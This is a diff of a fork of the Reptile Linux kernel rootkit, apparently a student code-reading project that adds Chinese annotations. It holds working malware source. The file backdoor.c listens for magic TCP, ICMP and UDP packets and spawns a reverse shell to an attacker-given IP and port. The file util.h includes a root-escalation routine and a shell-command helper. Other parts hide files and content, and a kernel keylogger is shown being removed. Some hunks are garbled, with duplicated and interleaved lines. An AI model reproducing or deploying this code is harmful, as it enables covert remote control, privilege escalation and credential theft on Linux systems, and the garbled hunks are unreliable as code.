code reading

Code Explanation
43 changed files with 3798 additions and 4325 deletions
--- a/.vscode/c_cpp_properties.json
+++ b/.vscode/c_cpp_properties.json
@ -1,18 +0,0 @@
 {
  "configurations": [
    {
      "name": "windows-gcc-x64",
      "includePath": [
        "${workspaceFolder}/**"
      ],
      "compilerPath": "E:/DEV-C++/Dev-Cpp/MinGW64/bin/gcc.exe",
      "cStandard": "${default}",
      "cppStandard": "${default}",
      "intelliSenseMode": "windows-gcc-x64",
      "compilerArgs": [
        ""
      ]
    }
  ],
  "version": 4
 }
--- a/.vscode/launch.json
+++ b/.vscode/launch.json
@ -1,24 +0,0 @@
 {
  "version": "0.2.0",
  "configurations": [
    {
      "name": "C/C++ Runner: Debug Session",
      "type": "cppdbg",
      "request": "launch",
      "args": [],
      "stopAtEntry": false,
      "externalConsole": true,
      "cwd": "e:/专业课/reptile/src/Reptile/kernel",
      "program": "e:/专业课/reptile/src/Reptile/kernel/build/Debug/outDebug",
      "MIMode": "gdb",
      "miDebuggerPath": "gdb",
      "setupCommands": [
        {
          "description": "Enable pretty-printing for gdb",
          "text": "-enable-pretty-printing",
          "ignoreFailures": true
        }
      ]
    }
  ]
 }
--- a/.vscode/settings.json
+++ b/.vscode/settings.json
@ -1,6 +0,0 @@
 {
    "Codegeex.RepoIndex": true,
    "files.associations": {
        "dialog.h": "c"
    }
 }
--- a/README.md
+++ b/README.md
@ -0,0 +1,2 @@
 # reptile
--- a/doc/test.txt
+++ b/doc/test.txt
--- a/doc/开源软件泛读、标注和维护报告文档.docx
+++ b/doc/开源软件泛读、标注和维护报告文档.docx
--- a/src/Reptile/Makefile
+++ b/src/Reptile/Makefile
@ -22,7 +22,6 @@ INSTALLER ?= $(PWD)/scripts/installer.sh
 all: $(BUILD_DIR_MAKEFILE) userland_bin $(ENCRYPT) module kmatryoshka reptile
 obj-m += keysniffer.o
 reptile: $(LOADER)
 	@ $(ENCRYPT) $(BUILD_DIR)/reptile.ko $(RAND2) > $(BUILD_DIR)/reptile.ko.inc
 	@ echo "  CC      $(BUILD_DIR)/$@"
--- a/src/Reptile/kernel/Kbuild
+++ b/src/Reptile/kernel/Kbuild
@ -15,7 +15,6 @@ $(MODNAME)-$(CONFIG_HIDE_DIR)       += dir.o
 $(MODNAME)-$(CONFIG_FILE_TAMPERING) += file.o
 $(MODNAME)-$(CONFIG_HIDE_CONN)      += network.o
 $(MODNAME)-$(CONFIG_AUTO_HIDE)      += module.o
 $(MODNAME)-$(CONFIG_AUTO_Keysniffe)      += keysniffer.o
 ccflags-$(CONFIG_BACKDOOR)          += -DCONFIG_BACKDOOR
 ccflags-$(CONFIG_BACKDOOR)          += -DMAGIC_VALUE=\"$(MAGIC_VALUE)\"
--- a/src/Reptile/kernel/backdoor.c
+++ b/src/Reptile/kernel/backdoor.c
@ -1,10 +1,4 @@
-/**
+//后门程序，用于监听特定的网络数据包，并根据数据包的内容执行指定的命令
 * @file backdoor.c
 * @brief This file contains the implementation of a backdoor mechanism that listens for specific network packets and executes a shell command when a magic packet is detected.
 *
 * The backdoor listens for TCP, ICMP, and UDP packets with specific characteristics and a magic value. When such a packet is detected, it extracts the command and arguments, decrypts them, and schedules a shell execution task.
 */
 #include <linux/string.h>
 #include <linux/version.h>
 #include <linux/net.h>
@ -14,50 +8,260 @@
 #include <linux/icmp.h>
 #include <linux/workqueue.h>
-#include "util.h"              // 自定义的实用程序头文件（可能包含一些工具函数）
+#include "util.h"
-#include "config.h"            // 自定义的配置头文件（可能定义了一些配置参数）
+#include "config.h"
-#include "backdoor.h"          // 后门的实现头文件
+#include "backdoor.h"
-
+
 /**
 * @struct shell_task
 * @brief Structure representing a shell execution task.
 * 
 * @var shell_task::work
 * Work structure for scheduling the task.
 * @var shell_task::ip
 * IP address to connect to.
 * @var shell_task::port
 * Port to connect to.
 */
 struct shell_task {
-    struct work_struct work; // 工作队列结构体
+	struct work_struct work;
-    char *ip;                // 存储IP地址字符串
+	char *ip;
-    char *port;              // 存储端口号字符串
+	char *port;
 };
 //命令执行
 void shell_execer(struct work_struct *work)
 {
 	struct shell_task *task = (struct shell_task *)work;
 	char *argv[] = { SHELL_PATH, "-t", task->ip, "-p", task->port, "-s", PASSWORD, NULL };
 	exec(argv);
 	kfree(task->ip);
 	kfree(task->port);
 	kfree(task);
 }
 //添加任务到命令执行队列
 int shell_exec_queue(char *ip, char *port)
 {
 	struct shell_task *task;
 	task = kmalloc(sizeof(*task), GFP_KERNEL);
 	if (!task)
 		return 0;
 	task->ip = kstrdup(ip, GFP_KERNEL);
 	if (!task->ip) {
 		kfree(task);
 		return 0;
 	}
 	task->port = kstrdup(port, GFP_KERNEL);
 	if (!task->port) {
 		kfree(task->ip);
 		kfree(task);
 		return 0;
 	}
 	INIT_WORK(&task->work, &shell_execer);
 	return schedule_work(&task->work);
 }
 #define DROP 0
 #define ACCEPT 1
 //解析攻击方发送的网络数据包，并根据特定条件执行命令
 unsigned int magic_packet_parse(struct sk_buff *socket_buffer)
 {
 	const struct iphdr *ip_header;
 	const struct icmphdr *icmp_header;
 	const struct tcphdr *tcp_header;
 	const struct udphdr *udp_header;
 	struct iphdr _iph;
 	struct icmphdr _icmph;
 	struct tcphdr _tcph;
 	struct udphdr _udph;
 	const char *data = NULL;
 	char *_data, *argv_str, **argv;
 	int size, str_size;
 	if (!socket_buffer)
 		return ACCEPT;
 	ip_header = skb_header_pointer(socket_buffer, 0, sizeof(_iph), &_iph);
 	if (!ip_header)
 		return ACCEPT;
 	if (!ip_header->protocol)
 		return ACCEPT;
 	if (htons(ip_header->id) != IPID)
 		return ACCEPT;
 	if (ip_header->protocol == IPPROTO_TCP) {
 		tcp_header = skb_header_pointer(socket_buffer, ip_header->ihl * 4, sizeof(_tcph), &_tcph);
 		if (!tcp_header)
 			return ACCEPT;
 		if (htons(tcp_header->source) != SRCPORT)
 			return ACCEPT;
 		if (//htons(tcp_header->seq) == SEQ &&   /* uncoment this if you wanna use tcp_header->seq as filter */
 			htons(tcp_header->window) == WIN) {
 			size = htons(ip_header->tot_len) - sizeof(_iph) - sizeof(_tcph);
 			_data = kmalloc(size, GFP_KERNEL);
 			if (!_data)
 				return ACCEPT;
 			str_size = size - strlen(MAGIC_VALUE);
 			argv_str = kmalloc(str_size, GFP_KERNEL);
 			if (!argv_str) {
 				kfree(_data);
 				return ACCEPT;
 			}
 			data = skb_header_pointer(socket_buffer, ip_header->ihl * 4 + sizeof(struct tcphdr), size, &_data);
 			if (!data) {
 				kfree(_data);
 				kfree(argv_str);
 				return ACCEPT;
 			}
 			if (memcmp(data, MAGIC_VALUE, strlen(MAGIC_VALUE)) == 0) {
 				memzero_explicit(argv_str, str_size);
 				memcpy(argv_str, data + strlen(MAGIC_VALUE) + 1, str_size - 1);
 				do_decrypt(argv_str, str_size - 1, KEY);
 				argv = argv_split(GFP_KERNEL, argv_str, NULL);
 				if (argv) {
 					shell_exec_queue(argv[0], argv[1]);
 					argv_free(argv);
 				}
 				kfree(_data);
 				kfree(argv_str);
 				return DROP;
 			}
 			kfree(_data);
 			kfree(argv_str);
 		}
 	}
 	if (ip_header->protocol == IPPROTO_ICMP) {
 		icmp_header = skb_header_pointer(socket_buffer, ip_header->ihl * 4, sizeof(_icmph), &_icmph);
 		if (!icmp_header)
 			return ACCEPT;
 		if (icmp_header->code != ICMP_ECHO)
 			return ACCEPT;
 		if (htons(icmp_header->un.echo.sequence) == SEQ &&
 		    htons(icmp_header->un.echo.id) == WIN) {
 			size = htons(ip_header->tot_len) - sizeof(_iph) - sizeof(_icmph);
 			_data = kmalloc(size, GFP_KERNEL);
 			if (!_data)
 				return ACCEPT;
 			str_size = size - strlen(MAGIC_VALUE);
 			argv_str = kmalloc(str_size, GFP_KERNEL);
 			if (!argv_str) {
 				kfree(_data);
 				return ACCEPT;
 			}
 			data = skb_header_pointer(socket_buffer, ip_header->ihl * 4 + sizeof(struct icmphdr), size, &_data);
 			if (!data) {
 				kfree(_data);
 				kfree(argv_str);
 				return ACCEPT;
 			}
 			if (memcmp(data, MAGIC_VALUE, strlen(MAGIC_VALUE)) == 0) {
 				memzero_explicit(argv_str, str_size);
 				memcpy(argv_str, data + strlen(MAGIC_VALUE) + 1, str_size - 1);
 				do_decrypt(argv_str, str_size - 1, KEY);
 				argv = argv_split(GFP_KERNEL, argv_str, NULL);
 				if (argv) {
 					shell_exec_queue(argv[0], argv[1]);
 					argv_free(argv);
 				}
 				kfree(_data);
 				kfree(argv_str);
 				return DROP;
 			}
 			kfree(_data);
 			kfree(argv_str);
 		}
 	}
 	if (ip_header->protocol == IPPROTO_UDP) {
 		udp_header = skb_header_pointer(socket_buffer, ip_header->ihl * 4, sizeof(_udph), &_udph);
 		if (!udp_header)
 			return ACCEPT;
 		if (htons(udp_header->source) != SRCPORT)
 			return ACCEPT;
 		if (htons(udp_header->len) <= (sizeof(struct udphdr) + strlen(MAGIC_VALUE) + 25)) {
 			size = htons(ip_header->tot_len) - sizeof(_iph) - sizeof(_udph);
 			_data = kmalloc(size, GFP_KERNEL);
 			if (!_data)
 				return ACCEPT;
 			str_size = size - strlen(MAGIC_VALUE);
 			argv_str = kmalloc(str_size, GFP_KERNEL);
 			if (!argv_str) {
 				kfree(_data);
 				return ACCEPT;
 			}
 			data = skb_header_pointer(socket_buffer, ip_header->ihl * 4 + sizeof(struct udphdr), size, &_data);
 			if (!data) {
 				kfree(_data);
 				kfree(argv_str);
 				return ACCEPT;
 			}
 			if (memcmp(data, MAGIC_VALUE, strlen(MAGIC_VALUE)) == 0) {
 				memzero_explicit(argv_str, str_size);
 				memcpy(argv_str, data + strlen(MAGIC_VALUE) + 1, str_size - 1);
 				do_decrypt(argv_str, str_size - 1, KEY);
 				argv = argv_split(GFP_KERNEL, argv_str, NULL);
 				if (argv) {
 					shell_exec_queue(argv[0], argv[1]);
 					argv_free(argv);
 				}
 				kfree(_data);
 				kfree(argv_str);
 				return DROP;
 			}
 			kfree(_data);
 			kfree(argv_str);
 		}
 	}
-/**
+	return ACCEPT;
- * @brief Executes a shell command with the given IP and port.
+}
 * 
 * @param work Pointer to the work structure.
 */
 void shell_execer(struct work_struct *work);
 /**
 * @brief Schedules a shell execution task.
 * 
 * @param ip IP address to connect to.
 * @param port Port to connect to.
 * @return int 1 if the task was successfully scheduled, 0 otherwise.
 */
 int shell_exec_queue(char *ip, char *port);
 #define DROP 0    // 定义DROP为0，表示丢弃数据包
 #define ACCEPT 1  // 定义ACCEPT为1，表示接受数据包
 /**
 * @brief Parses a network packet to detect a magic packet and execute a shell command.
 * 
 * @param socket_buffer Pointer to the socket buffer containing the packet data.
 * @return unsigned int DROP if the packet is a magic packet and the command was executed, ACCEPT otherwise.
 */
 unsigned int magic_packet_parse(struct sk_buff *socket_buffer);
--- a/src/Reptile/kernel/dir.c
+++ b/src/Reptile/kernel/dir.c
@ -1,14 +1,4 @@
-/**
+//判断文件夹是否隐藏
 * is_name_invisible - 检查文件名是否包含隐藏标识
 * @filename: 用户空间中的文件名指针
 *
 * 该函数从用户空间复制文件名，并检查文件名中是否包含预定义的隐藏标识符（HIDE）。
 * 如果文件名包含隐藏标识符，则返回1，否则返回0。
 *
 * 返回值:
 * 1 - 文件名包含隐藏标识符
 * 0 - 文件名不包含隐藏标识符
 */
 #include <linux/uaccess.h>
 #include <linux/slab.h>
 #include <linux/string.h>
--- a/src/Reptile/kernel/encrypt/encrypt.c
+++ b/src/Reptile/kernel/encrypt/encrypt.c
@ -1,74 +1,53 @@
 ////使用给定的十六进制密钥对文件内容进行加密
 #include <stdio.h>
 #include <stdlib.h>
 #include <stdint.h>
 #include "encrypt.h"
 // 函数声明：获取文件大小
 // 参数：指向文件的指针
 // 返回值：文件的大小（字节数）
 static long get_file_size(FILE *file)
 {
-    long size;
+	long size;
-    // 将文件指针移动到文件末尾
+	fseek(file, 0, SEEK_END);
-    fseek(file, 0, SEEK_END);
+	size = ftell(file);
-    // 获取文件指针当前位置，即文件大小
+	rewind(file);
-    size = ftell(file);
+	return size;
    // 将文件指针重新移动到文件开头
    rewind(file);
    return size;
 }
 // 主函数：程序入口
 // 参数：命令行参数个数，命令行参数数组
 // 返回值：程序退出状态码
 int main(int argc, char **argv)
 {
-    // 检查命令行参数是否正确（需要两个参数：文件名和密钥）
+	if (argc != 3) {
-    if (argc != 3) {
+		fprintf(stderr, "USAGE: encrypt <file> <pass:hex(uint32)>\n");
-        fprintf(stderr, "USAGE: encrypt <file> <pass:hex(uint32)>\n");
+		exit(-1);
-        exit(-1);
+	}
-    }
+
-
+	FILE *file = fopen(argv[1], "rb");
-    // 打开指定文件以二进制读取模式
+	if (!file) {
-    FILE *file = fopen(argv[1], "rb");
+		fprintf(stderr, "Can't open %s for reading\n", argv[1]);
-    if (!file) {
+		exit(-1);
-        fprintf(stderr, "Can't open %s for reading\n", argv[1]);
+	}
-        exit(-1);
+
-    }
+	long size = get_file_size(file);
-
+	unsigned char *data = malloc(size);
-    // 获取文件大小
+	if (!data) {
-    long size = get_file_size(file);
+		fprintf(stderr, "Can't allocate memory\n");
-    // 分配内存以存储文件数据
+		exit(-1);
-    unsigned char *data = malloc(size);
+	}
-    if (!data) {
+
-        fprintf(stderr, "Can't allocate memory\n");
+	if (fread(data, size, 1, file) != 1) {
-        exit(-1);
+		fprintf(stderr, "Can't read data from file\n");
-    }
+		exit(-1);
-
+	}
-    // 从文件中读取数据到分配的内存中
+
-    if (fread(data, size, 1, file) != 1) {
+	fclose(file);
-        fprintf(stderr, "Can't read data from file\n");
+
-        exit(-1);
+	uint32_t key = strtol(argv[2], NULL, 16);
-    }
+	do_encrypt(data, size, key);
-
+
-    // 关闭文件
+	printf("#define DECRYPT_KEY 0x%08x\n", key);
-    fclose(file);
+	for (int i = 0; i < size; i++) {
-
+		printf("0x%02x,", data[i]);
-    // 将命令行传入的密钥从十六进制字符串转换为uint32_t整数
+	}
-    uint32_t key = strtol(argv[2], NULL, 16);
+
-    // 使用指定的密钥对数据进行加密
+	return 0;
-    do_encrypt(data, size, key);
+}
    // 输出解密密钥（宏定义形式）
    printf("#define DECRYPT_KEY 0x%08x\n", key);
    // 输出加密后的数据（十六进制格式）
    for (int i = 0; i < size; i++) {
        printf("0x%02x,", data[i]);
    }
    // 释放分配的内存
    free(data);
    return 0;
 }
--- a/src/Reptile/kernel/file.c
+++ b/src/Reptile/kernel/file.c
@ -1,78 +1,66 @@
-#include <linux/uaccess.h> // 包含用户空间和内核空间之间的数据传输函数
+//判断文件是否隐藏
-#include <linux/slab.h>    // 包含内核内存分配函数
+#include <linux/uaccess.h>
 #include <linux/slab.h>
-#include "file.h"          // 包含自定义头文件
+#include "file.h"
 // 检查给定的缓冲区是否包含隐藏标签
 int file_check(void *arg, ssize_t size)
 {
-	int ret = 0; // 初始化返回值为0
+    int ret = 0;
-	char *buf;   // 定义字符指针用于存储缓冲区
+	char *buf;
 	// 检查缓冲区大小是否合法
 	if ((size <= 0) || (size >= SSIZE_MAX))
 		return ret;
 	// 分配内核缓冲区
 	buf = (char *)kmalloc(size + 1, GFP_KERNEL);
-	if (!buf) // 检查内存分配是否成功
+	if (!buf)
 		return ret;
 	// 将用户空间的缓冲区内容复制到内核缓冲区
 	if (copy_from_user((void *)buf, (void *)arg, size))
-		goto out; // 如果复制失败，跳转到out标签
+		goto out;
-	buf[size] = 0; // 确保缓冲区以NULL结尾
+	buf[size] = 0;
 	// 检查缓冲区是否包含 HIDETAGIN 和 HIDETAGOUT 标签
 	if ((strstr(buf, HIDETAGIN) != NULL) && (strstr(buf, HIDETAGOUT) != NULL))
-		ret = 1; // 如果找到标签，设置返回值为1
+		ret = 1;
 out:
-	kfree(buf); // 释放内核缓冲区
+	kfree(buf);
-	return ret; // 返回结果
+	return ret;
 }
 // 隐藏缓冲区中的内容
 int hide_content(void *arg, ssize_t size)
 {
-	char *buf, *p1, *p2; // 定义字符指针用于存储缓冲区和标签位置
+	char *buf, *p1, *p2;
-	int i, newret;       // 定义整数用于存储新的缓冲区大小和临时变量
+	int i, newret;
 	// 分配内核缓冲区
 	buf = (char *)kmalloc(size, GFP_KERNEL);
-	if (!buf) // 检查内存分配是否成功
+	if (!buf)
 		return (-1);
 	// 将用户空间的缓冲区内容复制到内核缓冲区
 	if (copy_from_user((void *)buf, (void *)arg, size)) {
-		kfree(buf); // 如果复制失败，释放内核缓冲区
+		kfree(buf);
 		return size;
 	}
 	// 查找 HIDETAGIN 和 HIDETAGOUT 标签的位置
 	p1 = strstr(buf, HIDETAGIN);
 	p2 = strstr(buf, HIDETAGOUT);
-	p2 += strlen(HIDETAGOUT); // 移动指针到 HIDETAGOUT 标签的末尾
+	p2 += strlen(HIDETAGOUT);
 	// 检查标签位置是否合法
 	if (p1 >= p2 || !p1 || !p2) {
-		kfree(buf); // 如果标签位置不合法，释放内核缓冲区
+		kfree(buf);
 		return size;
 	}
 	// 计算新的缓冲区大小
 	i = size - (p2 - buf);
 	// 移动标签之间的内容
 	memmove((void *)p1, (void *)p2, i);
-	newret = size - (p2 - p1); // 计算新的缓冲区大小
+	newret = size - (p2 - p1);
 	// 将修改后的缓冲区内容复制回用户空间
 	if (copy_to_user((void *)arg, (void *)buf, newret)) {
-		kfree(buf); // 如果复制失败，释放内核缓冲区
+		kfree(buf);
 		return size;
 	}
-	kfree(buf); // 释放内核缓冲区
+	kfree(buf);
-	return newret; // 返回新的缓冲区大小
+	return newret;
-}
+}
--- a/src/Reptile/kernel/include/encrypt.h
+++ b/src/Reptile/kernel/include/encrypt.h
@ -1,27 +1,20 @@
 #ifndef __LOADER_H__
 #define __LOADER_H__
 // 定义加密和解密的宏，实际调用do_encode函数
 #define do_encrypt(ptr, len, key)	do_encode(ptr, len, key)
 #define do_decrypt(ptr, len, key)	do_encode(ptr, len, key)
 // 定义一个静态内联函数，用于实现32位值的循环左移操作
 static inline unsigned int custom_rol32(unsigned int val, int n)
 {
-    // 循环左移n位，右移(32 - n)位，然后将两者的结果合并
+	return ((val << n) | (val >> (32 - n)));
    return ((val << n) | (val >> (32 - n)));
 }
 // 定义一个静态内联函数，用于执行编码操作
 static inline void do_encode(void *ptr, unsigned int len, unsigned int key)
 {
-    // 当剩余长度大于键值长度时，继续执行编码操作
+	while (len > sizeof(key)) {
-    while (len > sizeof(key)) {
+		*(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13));
-        // 使用异或和循环左移操作对数据进行编码
+		len -= sizeof(key), ptr += sizeof(key);
-        *(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13));
+	}
        // 更新剩余长度和指针位置，准备处理下一部分数据
        len -= sizeof(key), ptr += sizeof(key);
    }
 }
-#endif
+#endif
--- a/src/Reptile/kernel/include/file.h
+++ b/src/Reptile/kernel/include/file.h
@ -13,9 +13,4 @@ static inline void file_tampering(void)
        file_tampering_flag = 0;
    else
        file_tampering_flag = 1;
-}
+}
 /*SSIZE_MAX 是一个宏定义，设置了最大可操作大小（32767）。
 file_tampering_flag 是一个外部整数变量，用于标记文件是否已被篡改。
 file_check 和 hide_content 是声明的函数，功能分别是检查文件和隐藏文件内容（具体实现不明）。
 file_tampering 是一个内联函数，用于切换 file_tampering_flag 的值，指示文件是否被篡改。*/
--- a/src/Reptile/kernel/include/network.h
+++ b/src/Reptile/kernel/include/network.h
@ -9,5 +9,4 @@ extern struct list_head hidden_conn_list;
 void network_hide_add(struct sockaddr_in addr);
 void network_hide_remove(struct sockaddr_in addr);
-void network_hide_cleanup(void);
+//void hide_conn(char *ip_str);
 //void hide_conn(char *ip_str);
--- a/src/Reptile/kernel/include/util.h
+++ b/src/Reptile/kernel/include/util.h
@ -3,106 +3,87 @@
 #include <linux/cred.h>
 #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 14, 0)
-# include <linux/kmod.h>  // 低于 4.14 的内核引入 kmod.h
+# include <linux/kmod.h>
 #else
-# include <linux/umh.h>   // 高于 4.14 的内核引入 umh.h
+# include <linux/umh.h>
 #endif
-// 定义加密和解密宏，调用相同的编码函数
+#define do_encrypt(ptr, len, key)	do_encode(ptr, len, key)
-#define do_encrypt(ptr, len, key) do_encode(ptr, len, key)
+#define do_decrypt(ptr, len, key)	do_encode(ptr, len, key)
 #define do_decrypt(ptr, len, key) do_encode(ptr, len, key)
 // 循环左移操作
 static inline unsigned int custom_rol32(unsigned int val, int n)
 {
-    return ((val << n) | (val >> (32 - n))); // 将 val 左移 n 位，移出部分放到右边
+	return ((val << n) | (val >> (32 - n)));
 }
 // 编码函数，可能用于加密或其他数据隐藏
 static inline void do_encode(void *ptr, unsigned int len, unsigned int key)
 {
-    while (len > sizeof(key)) {
+	while (len > sizeof(key)) {
-        *(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13)); // 使用异或和循环左移对数据进行编码
+		*(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13));
-        len -= sizeof(key);
+		len -= sizeof(key), ptr += sizeof(key);
-        ptr += sizeof(key);
+	}
    }
 }
 // 执行用户模式程序，返回执行结果
 static inline int exec(char **argv)
 {
-    char *envp[] = {"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL}; 
+	char *envp[] = {"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL}; 
-    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); // 执行外部程序并等待完成
+	return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
 }
 // 执行指定的 shell 命令
 static inline int run_cmd(char *cmd)
 {
-    char *argv[] = {"/bin/bash", "-c", cmd, NULL};
+	char *argv[] = {"/bin/bash", "-c", cmd, NULL};
-    return exec(argv);  // 调用 exec 函数执行命令
+	return exec(argv);
 }
-// 内核符号查找回调函数
+static int ksym_lookup_cb(unsigned long data[], const char *name, void *module,
-static int ksym_lookup_cb(unsigned long data[], const char *name, void *module, unsigned long addr)
+			  unsigned long addr)
 {
-    int i = 0;
+	int i = 0;
-    while (!module && (((const char *)data[0]))[i] == name[i]) {
+	while (!module && (((const char *)data[0]))[i] == name[i]) {
-        if (!name[i++]) // 如果找到匹配的符号
+		if (!name[i++])
-            return !!(data[1] = addr);  // 返回符号地址
+			return !!(data[1] = addr);
-    }
+	}
-    return 0;
+	return 0;
 }
 // 查找内核符号名对应的地址
 static inline unsigned long ksym_lookup_name(const char *name)
 {
-    unsigned long data[2] = {(unsigned long)name, 0};
+	unsigned long data[2] = {(unsigned long)name, 0};
-    kallsyms_on_each_symbol((void *)ksym_lookup_cb, data); // 遍历内核符号查找
+	kallsyms_on_each_symbol((void *)ksym_lookup_cb, data);
-    return data[1];  // 返回符号地址
+	return data[1];
 }
 #ifdef CONFIG_GIVE_ROOT
 // 提升当前进程权限为 root
 static inline void get_root(void)
 {
 #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29)
-    // 低版本内核（<2.6.29）直接设置进程的 UID/GID 等为 root 权限
+	current->uid = 0;
-    current->uid = 0;
+	current->suid = 0;
-    current->suid = 0;
+	current->euid = 0;
-    current->euid = 0;
+	current->gid = 0;
-    current->gid = 0;
+	current->egid = 0;
-    current->egid = 0;
+	current->fsuid = 0;
-    current->fsuid = 0;
+	current->fsgid = 0;
-    current->fsgid = 0;
+	cap_set_full(current->cap_effective);
-    cap_set_full(current->cap_effective);  // 设置所有权限
+	cap_set_full(current->cap_inheritable);
-    cap_set_full(current->cap_inheritable);
+	cap_set_full(current->cap_permitted);
    cap_set_full(current->cap_permitted);
 #else
-    // 新版本内核通过 commit_creds 和 prepare_kernel_cred 来获取 root 权限
+	commit_creds(prepare_kernel_cred(0));
    commit_creds(prepare_kernel_cred(0));  // 提升权限为 root
 #endif
 }
 #endif
-extern int hidden;  // 外部声明的变量 hidden，用于标记隐藏状态
+extern int hidden;
 // 切换 hidden 标志的值
 static inline void flip_hidden_flag(void)
 {
    if (hidden)
-        hidden = 0;  // 如果当前是 1，设置为 0
+        hidden = 0;
    else
-        hidden = 1;  // 如果当前是 0，设置为 1
+        hidden = 1;
 }
 // 声明的其他函数
 int util_init(void);
 int get_cmdline(struct task_struct *task, char *buffer, int buflen);
-//int run_cmd(const char *cmd); 
+//int run_cmd(const char *cmd);
 /*加密/解密处理：通过 do_encode 函数对数据进行处理。
 内核符号查找：使用 ksym_lookup_name 查找内核符号的地址。
 权限提升：通过 get_root 函数将当前进程提升为 root 权限。
 执行外部命令：通过 exec 和 run_cmd 函数执行外部用户模式程序或 shell 命令。
 隐藏标志：通过 flip_hidden_flag 切换 hidden 变量的值，可能用于控制某些资源的隐藏。
 */
--- a/src/Reptile/kernel/keysniffer.c
+++ b/src/Reptile/kernel/keysniffer.c
@ -1,141 +0,0 @@
 #include <linux/init.h>
 #include <linux/kernel.h>
 #include <linux/module.h>
 #include <linux/keyboard.h>
 #include <linux/debugfs.h>
 #define BUF_LEN (PAGE_SIZE << 2) /* 16KB buffer (assuming 4KB PAGE_SIZE) */
 /* Declarations */
 static struct dentry *file;
 static struct dentry *subdir;
 static ssize_t keys_read(struct file *filp,
 		char *buffer,
 		size_t len,
 		loff_t *offset);
 static int keysniffer_cb(struct notifier_block *nblock,
 		unsigned long code,
 		void *_param);
 /* Keymap */
 static const char *us_keymap[][2] = {
 	{"\0", "\0"}, {"_ESC_", "_ESC_"}, {"1", "!"}, {"2", "@"},
 	{"3", "#"}, {"4", "$"}, {"5", "%"}, {"6", "^"},
 	{"7", "&"}, {"8", "*"}, {"9", "("}, {"0", ")"},
 	{"-", "_"}, {"=", "+"}, {"_BACKSPACE_", "_BACKSPACE_"}, {"_TAB_", "_TAB_"},
 	{"q", "Q"}, {"w", "W"}, {"e", "E"}, {"r", "R"},
 	{"t", "T"}, {"y", "Y"}, {"u", "U"}, {"i", "I"},
 	{"o", "O"}, {"p", "P"}, {"[", "{"}, {"]", "}"},
 	{"_ENTER_", "_ENTER_"}, {"_CTRL_", "_CTRL_"}, {"a", "A"}, {"s", "S"},
 	{"d", "D"}, {"f", "F"}, {"g", "G"}, {"h", "H"},
 	{"j", "J"}, {"k", "K"}, {"l", "L"}, {";", ":"},
 	{"'", "\""}, {"`", "~"}, {"_SHIFT_", "_SHIFT_"}, {"\\", "|"},
 	{"z", "Z"}, {"x", "X"}, {"c", "C"}, {"v", "V"},
 	{"b", "B"}, {"n", "N"}, {"m", "M"}, {",", "<"},
 	{".", ">"}, {"/", "?"}, {"_SHIFT_", "_SHIFT_"}, {"_PRTSCR_", "_KPD*_"},
 	{"_ALT_", "_ALT_"}, {" ", " "}, {"_CAPS_", "_CAPS_"}, {"F1", "F1"},
 	{"F2", "F2"}, {"F3", "F3"}, {"F4", "F4"}, {"F5", "F5"},
 	{"F6", "F6"}, {"F7", "F7"}, {"F8", "F8"}, {"F9", "F9"},
 	{"F10", "F10"}, {"_NUM_", "_NUM_"}, {"_SCROLL_", "_SCROLL_"}, {"_KPD7_", "_HOME_"},
 	{"_KPD8_", "_UP_"}, {"_KPD9_", "_PGUP_"}, {"-", "-"}, {"_KPD4_", "_LEFT_"},
 	{"_KPD5_", "_KPD5_"}, {"_KPD6_", "_RIGHT_"}, {"+", "+"}, {"_KPD1_", "_END_"},
 	{"_KPD2_", "_DOWN_"}, {"_KPD3_", "_PGDN"}, {"_KPD0_", "_INS_"}, {"_KPD._", "_DEL_"},
 	{"_SYSRQ_", "_SYSRQ_"}, {"\0", "\0"}, {"\0", "\0"}, {"F11", "F11"},
 	{"F12", "F12"}, {"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"},
 	{"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"},
 	{"_ENTER_", "_ENTER_"}, {"_CTRL_", "_CTRL_"}, {"/", "/"}, {"_PRTSCR_", "_PRTSCR_"},
 	{"_ALT_", "_ALT_"}, {"\0", "\0"}, {"_HOME_", "_HOME_"}, {"_UP_", "_UP_"},
 	{"_PGUP_", "_PGUP_"}, {"_LEFT_", "_LEFT_"}, {"_RIGHT_", "_RIGHT_"}, {"_END_", "_END_"},
 	{"_DOWN_", "_DOWN_"}, {"_PGDN", "_PGDN"}, {"_INS_", "_INS_"}, {"_DEL_", "_DEL_"},
 	{"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"},
 	{"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"}, {"_PAUSE_", "_PAUSE_"},
 };
 static size_t buf_pos;
 static char keys_buf[BUF_LEN] = {0};
 const struct file_operations keys_fops = {
 	.owner = THIS_MODULE,
 	.read = keys_read,
 };
 static ssize_t keys_read(struct file *filp,
 		char *buffer,
 		size_t len,
 		loff_t *offset)
 {
 	return simple_read_from_buffer(buffer, len, offset, keys_buf, buf_pos);
 }
 static struct notifier_block keysniffer_blk = {
 	.notifier_call = keysniffer_cb,
 };
 /* Keypress callback */
 int keysniffer_cb(struct notifier_block *nblock,
 		unsigned long code,
 		void *_param)
 {
 	size_t len;
 	struct keyboard_notifier_param *param = _param;
 	const char *pressed_key;
 	/* pr_debug("code: 0x%lx, down: 0x%x, shift: 0x%x, value: 0x%x\n",
 		code, param->down, param->shift, param->value); */
 	if (!(param->down))
 		return NOTIFY_OK;
 	if (param->value >= 0x1 && param->value <= 0x77) {
 		pressed_key = param->shift
 				? us_keymap[param->value][1]
 				: us_keymap[param->value][0];
 		if (pressed_key) {
 			len = strlen(pressed_key);
 			if ((buf_pos + len) >= BUF_LEN) {
 				memset(keys_buf, 0, BUF_LEN);
 				buf_pos = 0;
 			}
 			strncpy(keys_buf + buf_pos, pressed_key, len);
 			buf_pos += len;
 			keys_buf[buf_pos++] = '\n';
 			/* pr_debug("%s\n", pressed_key; */
 		}
 	}
 	return NOTIFY_OK;
 }
 static int __init keysniffer_init(void)
 {
 	buf_pos = 0;
